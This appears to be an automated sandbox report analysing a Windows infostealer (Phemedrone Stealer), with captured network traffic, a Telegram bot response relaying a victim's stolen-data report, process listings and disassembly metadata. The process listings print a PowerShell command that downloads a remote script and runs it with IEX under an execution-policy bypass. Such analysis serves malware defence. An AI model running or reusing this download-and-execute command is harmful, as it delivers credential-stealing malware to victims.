                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 1c b8 d0 11 1a 49 1f fd ca 85 37 fa 59 cd ed 20 5e a4 06 37 6c 2f 0f 86 49 44 2c e0 63 29 76 3d b4 03 0a 45 6e 91 0e 52 72 1f fa 2b d0 74 97 1a 3e 3e a2 ec 35 a2 4e dc 19 c2 e9 06 79 bf 7e ce 7f c1 d3 26 15 f0 13 5f ac 90 cc 71 fa 80 51 e3 af cd be cf 26 3c ea 7a 6a 16 58 b4 4e bd b2 00 09 65 6b fe 9e ee 9f 2f 5c 3f 2c 1c bf 9e 20 dd b5 73 69 d8 cf 7b 98 ae 1e 65 c1 68 4a f6 a5 4c 08 8f df b4 28 cf 7a d7 21 5c 66 b6 5e ec d0 77 69 3b 1b 8a 4f df 2c 55 68 24 1d 47 ef 1c 36 e1 15 fc ad ac cc 0f 86 d5 15 a9 aa 65 0b 28 38 c4 44 97 0d 72 cf 4c 49 98 46 ef 25 b6 ca 04 7f d6 ff 3c 6e a1 fe 0d 41 34 a5 5f 89 c0 41 67 1d 52 fa cd b5 31 5d 86 b6 b8 85 4a 7b ae fc 6e 76 ae 72 a5 a8 74 80 29 c5 58 34 90 19 35 83 84 8d 51 f1 9c 9d 7b 28 01 0f 13 67 b3 82 fd 21 a0 d1
                                                          Data Ascii: I7Y ^7l/ID,c)v=EnRr+t>>5Ny~&_qQ&<zjXNek/\?, si{ehJL(z!\f^wi;O,Uh$G6e(8DrLIF%<nA4_AgR1]J{nvrt)X45Q{(g!
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 58 09 cd 74 26 62 b4 ed a0 23 25 d3 1e e0 f3 b0 0d 5a be 66 0f 36 90 7d 6e 98 f5 cf f5 06 b7 70 87 72 29 0f 9c e9 ca 5b c1 87 95 06 38 8d 56 c5 25 95 39 d4 12 e7 df 3c 2d 83 9e a0 53 9c ad 06 64 de 63 39 2f ba 9c d5 b5 13 4c 0a 11 03 bb ea f2 6c 5a 54 98 b9 9a 2e 37 04 a3 df 9d 66 0f cb b1 c2 56 2f 35 e7 2d 7e 76 b3 6a d6 8f 86 74 4c db 7f 07 ff 1d 8a 0f 75 ee 9d 54 55 18 72 2b fe 20 7d 2d 32 e5 95 77 75 ca ff 28 27 0f f0 21 34 a1 a2 d3 95 b6 85 73 d9 1c c8 ff fa f1 b8 82 91 ab 0c ff 8e 4e 3e 59 2d f6 68 3f 34 6b 4c d6 bf 4f 46 13 31 53 3c 0f 82 55 de 27 d5 ec 18 33 e2 17 de ee 33 56 c1 42 54 79 42 5f 3a 01 a2 dc 22 33 cc bd 7a 09 9a a1 8d f9 95 65 4a af c5 4d 96 33 16 5d 81 be 69 c8 d5 07 ee 3e 45 98 6d bb ed 16 44 dc 33 bf 00 34 39 20 4d 54 d8 60 30 1e
                                                          Data Ascii: Xt&b#%Zf6}npr)[8V%9<-Sdc9/LlZT.7fV/5-~vjtLuTUr+ }-2wu('!4sN>Y-h?4kLOF1S<U'33VBTyB_:"3zeJM3]i>EmD349 MT`0
                                                          2024-11-04 08:39:06 UTC145OUTData Raw: fd 6c 3e 3a a0 be 60 5c d2 f3 af e8 22 69 1b 4d d3 80 0a e5 82 9f 40 9f 5f c7 ed 04 a2 56 b4 44 39 0c 48 ac df c9 b5 7f e5 b0 c6 3a 1b 5d aa 44 e7 8a 8c 04 84 27 b0 d0 0e 76 56 37 2d 25 a6 f0 6b ea 87 2e f1 3e 53 7f d9 dd 88 5c fe 93 39 dd d1 53 e6 26 e8 44 58 6b 65 d2 3e 75 aa 0c 67 67 eb 42 85 15 ba 70 5d 0a 3d a8 3c c1 18 4b c6 4f ef 41 63 1a ec 6a e7 05 28 b3 31 bb be 87 f1 f9 8f 3e a0 16 e9 b5 d3 75 4d 90 cc 1b e1 de 67 0a 4d
                                                          Data Ascii: l>:`\"iM@_VD9H:]D'vV7-%k.>S\9S&DXke>uggBp]=<KOAcj(1>uMgM
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 7b 64 c9 9f 9a f5 b4 85 30 c2 84 6b bc 7a 54 a4 6e 6f 16 97 d7 ba 8b fb 59 58 e5 96 50 85 d6 1e be 39 11 f5 88 c7 b7 5e 80 35 7f 58 8b 14 f0 78 0a 1e 7c 45 20 c0 1f 21 a9 7d dd c5 7b b3 98 c6 5c 1d 26 f5 84 e2 3e 96 9b 9b 04 93 35 7e 6f 14 96 35 53 1a f8 12 2c c3 6a ba cc 4d 9f 47 6b a1 88 63 05 67 eb 17 2d 85 57 b0 3d ce 58 0f e6 cb 1a 77 c3 51 85 0e 48 bb 8a 82 eb 6a 85 3d 0a f8 e9 ac 79 c0 9f e8 28 c3 b7 ba 34 14 5f 91 01 a8 8b 2a b4 e8 bc a8 ee 5b 07 82 da 50 39 9c a6 52 1b c8 32 91 84 d9 31 30 bb a2 2f 30 93 24 73 02 a1 d6 1a 5e e0 3d 56 09 f8 a0 61 15 58 22 57 29 2b e8 2a a3 0d 76 62 ff ba 4f 43 7b 47 8d 82 8f 16 1a 6d d4 5d 05 9b b3 f2 fd 8b 96 e1 1e 55 ed aa 00 31 5c 2e 3f 18 f1 dc 7a 50 07 d2 6f 36 2e b9 c2 f1 ec 77 10 1f 4f ed 5b 5f a1 63 c2 4f
                                                          Data Ascii: {d0kzTnoYXP9^5Xx|E !}{\&>5~o5S,jMGkcg-W=XwQHj=y(4_*[P9R210/0$s^=VaX"W)+*vbOC{Gm]U1\.?zPo6.wO[_cO
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: b6 87 69 4b 24 2c 60 df f1 ee 63 13 ee 42 0b 4e 2d e3 c2 c9 ad f6 17 70 c0 1a 8d 19 8f 5b 7e ae 2b 62 18 5d b7 c6 31 84 77 5a 55 e2 21 34 22 12 a0 20 53 44 ab f0 10 60 03 1b af a0 2f 5e 9c 1c 59 fd 7f d0 08 a7 6b 2f e6 db b0 87 bd 56 51 60 7e ce 89 ab 4f 88 46 cc 6f c4 9a 98 2e 97 ac 23 aa 8d d5 b0 d1 09 9d c1 fb c0 a3 03 43 8b 2a c5 07 93 aa b8 fa 2c 77 0e e9 50 3a 3c 2e 1f a0 0b 99 72 e4 bc 14 b2 91 c0 c8 be b8 ee c3 52 0c 08 0b 10 7d cd 0f 2d 4c b6 60 3b bd fd 02 a4 ae 9e ee 2b 5f dd 77 76 e4 82 36 6a 6a f0 b2 a0 18 94 89 be c3 a5 d2 00 5c 6c 17 ea ea b6 36 d2 08 2b 38 f9 b8 7b c5 1c 3e e1 63 9a 87 62 f8 cc 96 e1 10 90 1b 7e cf 61 87 7c f0 74 1b b3 14 67 c7 2e 2e f3 a2 a4 4e ed ad 51 35 ea f0 e8 ad d8 8c fb 09 fc 88 46 ba 84 7d 53 5f e5 8a 00 57 24 52
                                                          Data Ascii: iK$,`cBN-p[~+b]1wZU!4" SD`/^Yk/VQ`~OFo.#C*,wP:<.rR}-L`;+_wv6jj\l6+8{>cb~a|tg..NQ5F}S_W$R
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 48 b1 03 80 81 93 ff 69 93 95 f4 1a 85 e9 13 35 f8 44 df 38 1a ed 20 18 87 cb ed 73 a9 d4 2d 23 ff 06 30 f4 eb a4 55 95 eb f5 d2 03 ba 37 9e 88 8c 5c 51 dc 30 51 3c e2 5e d5 b8 f3 dc 0b b2 46 22 fd 1b 5c f9 bd 17 80 bd 8d 48 55 81 83 da 81 8d e3 2e a3 d2 21 a9 70 22 79 ef 35 cd 7c 11 c3 0d 10 dd d4 24 99 aa 5e e4 4f f7 8b 9c 99 bb 6e 27 c3 d8 90 8b 6a f3 43 a7 85 1f 0d 43 42 81 d8 c3 e4 ca 3f 3a 64 0b 90 a6 22 83 a9 31 4c b4 58 eb 0e fa 59 2f a8 f0 f0 07 53 7a 54 3c ff 9e ea e2 61 4d cd 20 6d e6 55 b3 87 57 bd 97 50 0f 8d cf 2d d6 42 e3 c9 69 c3 ba ad dc 7f aa d8 0c b7 f8 42 26 cb ff de d5 e9 62 49 d6 0d cf 86 e7 f2 12 ac e5 ab 27 05 8a b5 9f 9d 9e 35 a3 79 08 e5 75 2b d7 6f 7e 06 1b 6c 66 c2 33 ac 84 5f dd 94 8c 2b 69 7f 67 8b 2d 72 0f 61 30 cd 4d e3 19
                                                          Data Ascii: Hi5D8 s-#0U7\Q0Q<^F"\HU.!p"y5|$^On'jCCB?:d"1LXY/SzT<aM mUWP-BiB&bI'5yu+o~lf3_+ig-ra0M
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 4f a9 16 0e fb 31 25 ea 3b e4 46 1a 95 cc 63 02 bd 1d 35 3a 35 c5 6a d5 99 92 21 d9 b2 02 9a 68 81 b2 85 79 a3 4c 18 27 f9 c1 0a 72 f0 8c b8 5c 0b 1e 19 17 d6 d4 97 56 6f 82 25 08 46 22 81 ec f7 28 f4 dc 62 aa 65 ca 87 2b 11 12 d1 08 0e d0 c4 44 be 02 57 57 39 fd cd 96 6d fd c6 a2 c8 a6 dd 39 4d fe 4b 87 3b 77 52 94 2c 4a 78 db 58 5d ad 03 c4 a5 ec 1e 92 9d ed b5 9c b0 48 77 e4 fa c5 95 60 29 cb 5a ab 77 3d 54 ff b4 d0 b5 50 5d 8c a0 0e 08 cd 9d 7f 01 49 79 5e d2 f2 fc d1 53 ff 22 b7 88 58 c0 55 89 f0 60 ea 61 aa 74 ed a5 71 44 a7 14 9c c0 68 1b 90 3e ed 7d 44 1b 9a 14 58 b0 14 82 4b 26 c8 72 4c 94 a6 fe d3 5a 59 d4 09 d9 28 e1 54 87 ea 75 5b 9c 66 df f2 53 0e 77 d9 88 da 66 61 a9 e9 7d e8 0f 97 e6 75 e0 68 90 2e 03 83 a7 e3 4b 88 84 58 e0 25 65 7d a8 ea
                                                          Data Ascii: O1%;Fc5:5j!hyL'r\Vo%F"(be+DWW9m9MK;wR,JxX]Hw`)Zw=TP]Iy^S"XU`atqDh>}DXK&rLZY(Tu[fSwfa}uh.KX%e}
                                                          2024-11-04 08:39:07 UTC1285INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Mon, 04 Nov 2024 08:39:07 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 897
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":true,"result":{"message_id":259,"from":{"id":8091768794,"is_bot":true,"first_name":"phstl","username":"phstlbot"},"chat":{"id":-4545922765,"title":"LOGS ERMANDO DUCATI [EXE]","type":"group","all_members_are_administrators":true},"date":1730709547,"document":{"file_name":"[US]173.254.250.69-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBA2coiCsWAjE2MRuQlhuR60YLzmRrAALgbQACz2NBSV5Rd-JmtNnsNgQ","file_unique_id":"AgAD4G0AAs9jQUk","file_size":722928},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.69 (United States)\n - Tag: ermando (Yvoluze)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":108,"type":"pre"},{"offset":167,"length":16,"type":"mention"}]}}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Users\user\Desktop\DBp7mBJwqD.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\DBp7mBJwqD.exe"
                                                          Imagebase:0x7ff60ed10000
                                                          File size:14'848'000 bytes
                                                          MD5 hash:C5D36C7404A03EC6DF8024737D97A0C8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
                                                          Imagebase:0x7ff716680000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
                                                          Imagebase:0x7ff716680000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
                                                          Imagebase:0x7ff716680000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:03:38:53
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff6220e0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:10
                                                          Start time:03:38:57
                                                          Start date:04/11/2024
                                                          Path:C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y
                                                          Imagebase:0x2545cab0000
                                                          File size:252'416 bytes
                                                          MD5 hash:BCB323EB0CFD10D58CF134BC7BDC8D67
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 79%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00007FFE7DEAE69C Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1624743941.00007FFE7DEAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DEAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7dead000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10f21a21965bd48e4ee614db2709b3312a45a9b6c36d5277c2c27e2e4c5ac9ff
                                                            • Instruction ID: bbf9e21266f7fbd503f21dfdc539a406d8c9c12a769eabef28950f8d1160b8fd
                                                            • Opcode Fuzzy Hash: 10f21a21965bd48e4ee614db2709b3312a45a9b6c36d5277c2c27e2e4c5ac9ff
                                                            • Instruction Fuzzy Hash: 8411913150CF088F9BA8EF1DE48596237E0FB98321B10065FE459C7666D731F881CB82
                                                            Function 00007FFE7DFC33B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625378113.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7dfc0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction ID: 82df834b79a4cc6a8b0a21f00b4947252c11fc1bb5b8517047c4faf708f1f59a
                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction Fuzzy Hash: 0601677111CB0C4FD758EF0CE451AA5B7E0FB95364F10066EE58AC3661DA36E892CB45
                                                            Function 00007FFE7E094817 Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de9f8c43a487510be07df9fdd6e369d65e70c3bbee38d378eb42071baf1fa416
                                                            • Instruction ID: 3577fabf5b512f5f959e7b72f1eb52b6f1cd2bcec203346c273090c54e8a7b7c
                                                            • Opcode Fuzzy Hash: de9f8c43a487510be07df9fdd6e369d65e70c3bbee38d378eb42071baf1fa416
                                                            • Instruction Fuzzy Hash: 0BF05E32A1C5858FD7A4EB1CE4828A873E1EF4532471900B7D15DC7477DA2AAC418740
                                                            Function 00007FFE7E0966E2 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fdee6ce009377f5297da82cbfeb0ca1175c1f64f33883fc514f8185eeec0e5
                                                            • Instruction ID: dcd7fa51c9fb6e606031d45ae1e5ba867057864f7ce3f72f53c50053afb95d03
                                                            • Opcode Fuzzy Hash: 80fdee6ce009377f5297da82cbfeb0ca1175c1f64f33883fc514f8185eeec0e5
                                                            • Instruction Fuzzy Hash: E9F05E32A0C5458FD6A9EB1CE4454A877E1EF4632471600B7D15AC7473DA2AEC418740
                                                            Function 00007FFE7E094AC5 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5d145cdc09163d38ecd44dec47bda9339480721f0d1c44efb500562f4ec0046
                                                            • Instruction ID: 7c6e63ff89ffc1abe9125907ea45d63b3bf73de8bfe2b0d674de791073c9f0bc
                                                            • Opcode Fuzzy Hash: a5d145cdc09163d38ecd44dec47bda9339480721f0d1c44efb500562f4ec0046
                                                            • Instruction Fuzzy Hash: A1F08C32A1C5588FD7A4EB5CE4818A877E0EF06320B0A00F7D19ACB473EA7AEC44C740
                                                            Function 00007FFE7E091B3D Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1625971106.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffe7e090000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a5e37a7b1eb3ce7972ac800982b35705d24b7d8c24f95b3043d8e78f2ba3ae9
                                                            • Instruction ID: e7f9f506f9ad5a0a6b99ce2fc2a4b03a90dc8f469bd6313349e15c84f754a6d3
                                                            • Opcode Fuzzy Hash: 1a5e37a7b1eb3ce7972ac800982b35705d24b7d8c24f95b3043d8e78f2ba3ae9
                                                            • Instruction Fuzzy Hash: BAE05B32708D58CF9754DA5CE4895D9B7E1FF5C2613140177D54DC7231DA20D892C780

                                                            Execution Graph

                                                            Execution Coverage:10.9%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:9
                                                            Total number of Limit Nodes:0
                                                            execution_graph 2331 7ffe7dfc794a 2333 7ffe7dfe0960 CreateFileW 2331->2333 2334 7ffe7dfe0a2e 2333->2334 2335 7ffe7dfc795a 2336 7ffe7dfe0bd0 SetFileInformationByHandle 2335->2336 2338 7ffe7dfe0c67 2336->2338 2339 7ffe7dfc8032 2340 7ffe7dfc8035 LoadLibraryA 2339->2340 2342 7ffe7dfd43ef 2340->2342

                                                            Executed Functions

                                                            Function 00007FFE7DFC8032 Relevance: 1.8, APIs: 1, Instructions: 267COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.1528627716.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffe7dfc0000_WDSecureUtilities_548.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4e9ac10beecea3d54e761a7191ecea6e3a4afc1bc599aa07fa98ce3693065cc
                                                            • Instruction ID: 7e6d107e8bf26b9579d9f33cd4ac140366d110499ab5b0c4ee48c13a9055eba4
                                                            • Opcode Fuzzy Hash: f4e9ac10beecea3d54e761a7191ecea6e3a4afc1bc599aa07fa98ce3693065cc
                                                            • Instruction Fuzzy Hash: 9B81F432A1898D4FEB68EF2CD8567F93BD0FF55355F04427BD45DC32A2EA24A8418B81
                                                            Function 00007FFE7DFC794A Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 24 7ffe7dfc794a-7ffe7dfe09c3 28 7ffe7dfe09cd-7ffe7dfe0a2c CreateFileW 24->28 29 7ffe7dfe09c5-7ffe7dfe09ca 24->29 30 7ffe7dfe0a34-7ffe7dfe0a5c 28->30 31 7ffe7dfe0a2e 28->31 29->28 31->30
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.1528627716.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffe7dfc0000_WDSecureUtilities_548.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 3bc59816bb548607194e092645cf9060dd2d8d6806ece3f813b08b5ec633845a
                                                            • Instruction ID: bb01ac0c937e8a8c5c3a50b913706989a66608f6afff9420b52c638d89841557
                                                            • Opcode Fuzzy Hash: 3bc59816bb548607194e092645cf9060dd2d8d6806ece3f813b08b5ec633845a
                                                            • Instruction Fuzzy Hash: D231A23191CA5C9FDB58EF58D849AFD7BE0FB69321F04422EE049E3251DB70A8028BC1
                                                            Function 00007FFE7DFC795A Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 33 7ffe7dfc795a-7ffe7dfe0c65 SetFileInformationByHandle 37 7ffe7dfe0c6d-7ffe7dfe0c9c 33->37 38 7ffe7dfe0c67 33->38 38->37
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.1528627716.00007FFE7DFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DFC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffe7dfc0000_WDSecureUtilities_548.jbxd
                                                            Similarity
                                                            • API ID: FileHandleInformation
                                                            • String ID:
                                                            • API String ID: 3935143524-0
